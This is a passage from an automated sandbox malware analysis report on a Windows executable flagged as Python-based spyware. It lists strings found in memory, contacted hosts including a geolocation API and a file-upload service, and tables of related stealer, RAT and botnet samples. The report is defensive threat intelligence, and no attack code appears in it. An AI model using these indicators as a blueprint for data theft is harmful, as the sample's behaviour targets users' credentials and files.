                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datamain.exe, 00000002.00000003.1922205226.000001ED8A3B9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908790516.000001ED8A389000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937965361.000001ED8A3BD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757862109.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911158167.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757279861.000001ED8A3A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952635906.000001ED8A3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://yahoo.com/main.exe, 00000002.00000003.1914711565.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925966743.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CB4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958011767.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1936495508.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1957482809.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906717397.000001ED8CB5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crl.securetrust.com/STCA.crl0main.exe, 00000002.00000002.1960197370.000001ED8D47B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2main.exe, 00000002.00000002.1958325647.000001ED8CD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regularmain.exe, 00000002.00000003.1950132310.000001ED8C1DD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926306346.000001ED8C905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927037674.000001ED8C9A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8C8F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924390284.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909775081.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779284915.000001ED8C94D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C9B6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909516582.000001ED8C97F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779822300.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910632349.000001ED8C832000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8C93A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C82C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924841077.000001ED8C904000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907334349.000001ED8C1D8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C967000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1912333326.000001ED8CB37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949238926.000001ED8CB3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://html.spec.whatwg.org/multipage/main.exe, 00000002.00000003.1911242619.000001ED8C19C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C19E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910532956.000001ED8C186000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938242403.000001ED8C1B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.quovadisglobal.com/cps0main.exe, 00000002.00000003.1927231579.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956596958.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931812031.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929359605.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1913347833.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/pyparsing/pyparsing/wikimain.exe, 00000002.00000003.1929359605.000001ED8C7F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlmain.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.rfc-editor.org/rfc/rfc8259#section-8.1main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D38E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904551547.000001ED8D391000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935034726.000001ED8D393000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdfmain.exe, 00000002.00000003.1911808962.000001ED8D4EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930747460.000001ED8D8A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929669509.000001ED8D4F2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926909734.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932146162.000001ED8D8C8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1939188888.000001ED8D509000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904841401.000001ED8D8A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924011561.000001ED8D8A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.iana.org/time-zones/repository/tz-link.htmlmain.exe, 00000002.00000003.1771560505.000001ED8C2AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://upload.pypi.org/legacy/main.exe, 00000002.00000002.1956147178.000001ED8C670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://docs.python.org/library/itertools.html#recipesmain.exe, 00000002.00000002.1958092560.000001ED8CB70000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://tools.ietf.org/html/rfc4880main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1944856369.000001ED8D333000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938154397.000001ED8D32F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959396594.000001ED8D333000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946091649.000001ED8D34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://requests.readthedocs.iomain.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://markupsafe.palletsprojects.com/main.exe, 00000000.00000003.1725416360.00000237BBB35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://web.cs.ucdavis.edu/main.exe, 00000002.00000003.1928933984.000001ED8D916000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937262511.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1963159329.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904841401.000001ED8D8A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924011561.000001ED8D8A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://repository.swisssign.com/main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1934358364.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906540519.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931645550.000001ED8C7C9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904072781.000001ED8D2A0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925413265.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909559842.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926629291.000001ED8C7C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdfmain.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931211381.000001ED8D840000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962816126.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949750996.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1942764256.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcamain.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958768124.000001ED8D150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://packaging.python.org/en/latest/specifications/declaring-project-metadata/main.exe, 00000002.00000003.1911242619.000001ED8C19C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C19E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910532956.000001ED8C186000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938242403.000001ED8C1B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://crl.xrampsecurity.com/XGCA.crlmain.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://github.com/pypa/setuptools/issues/1024.main.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.python.orgmain.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                              ip-api.comUnited States
                                                                                                                                                                                                              53334TUT-ASUSfalse
                                                                                                                                                                                                              45.112.123.126
                                                                                                                                                                                                              api.gofile.ioSingapore
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1579350
                                                                                                                                                                                                              Start date and time:2024-12-21 21:42:11 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 7m 20s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:24
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:main.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal68.spyw.evad.winEXE@37/137@2/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 50%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                                              • Number of executed functions: 42
                                                                                                                                                                                                              • Number of non-executed functions: 71
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 2.16.168.117, 2.16.168.102, 52.165.164.15, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              15:43:18API Interceptor2x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              208.95.112.1HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                                                                                                                              dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              45.112.123.126urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                    stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                      chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                                                          Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                              gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  api.gofile.iourS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 94.139.32.3
                                                                                                                                                                                                                                  Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  ip-api.comHX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  TUT-ASUSHX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  AMAZON-02USnshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 52.25.84.238
                                                                                                                                                                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 18.195.151.252
                                                                                                                                                                                                                                  sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 13.50.244.72
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  • 185.166.143.50
                                                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 18.163.241.112
                                                                                                                                                                                                                                  m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 18.183.188.74
                                                                                                                                                                                                                                  star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 76.223.52.162
                                                                                                                                                                                                                                  nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 54.153.44.160
                                                                                                                                                                                                                                  nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 18.163.241.121
                                                                                                                                                                                                                                  nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 54.181.79.122
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pydchos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                                      shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                                        lz4wnSavmK.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                          WVuXCNNYG0.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                            dipwo1iToJ.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                              ROh2ijuEpr.exeGet hashmaliciousBabuk, ContiBrowse
                                                                                                                                                                                                                                                zed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  back.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    zed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
